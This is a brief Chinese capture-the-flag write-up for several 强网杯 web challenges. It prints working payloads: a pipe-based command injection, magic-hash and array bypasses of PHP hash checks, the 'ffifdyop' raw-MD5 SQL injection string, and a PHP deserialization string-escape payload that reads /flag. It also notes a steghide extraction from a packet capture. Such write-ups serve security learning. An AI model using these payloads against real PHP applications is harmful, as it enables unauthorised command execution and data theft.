强网杯web部分wp

主动
?ip=127.0.0.1|cat ls 使用内联执行

Funhash

hash1=0e001233333333333334557778889可绕过

数组绕过

ffifdyop构成万能**
?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyop
flag{y0u_w1ll_l1ke_h4sh}

web辅助

看到这个熟悉的替换，可以进行序列化字符逃逸
class.php里面的几个函数的利用方式 大概的就是$name()可触发__invoke()，然后stristr($this->name, ‘Yasuo’)可触发__toString()然后可以cat /flag。
然后算一下吞掉passwd字段要23位置，用十二个\0*\0,替换后可以吞掉24位，后面补一位即可。
使用16进制绕过check（）
Payload:
username=\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0\0*\0&password=1";S:7:"\00*\00pass";O:7:“topsolo”:1:{S:7:"\00*\00\6E\61\6d\65";O:7:“midsolo”:1:{S:7:"\00*\00\6E\61\6d\65";O:6:“jungle”:2:{S:7:"\00*\00\6E\61\6d\65";s:0:"";}}};S:8:"\00*\00admin";i:1;}

flag{6c78e4f9-9d9c-46f7-81af-4aaf0ac31ae3}

upload
Wireshark打开，可以发现上传了一张图片，把图片提取出来，提示steghide，用steghide把文件提取出来密码123456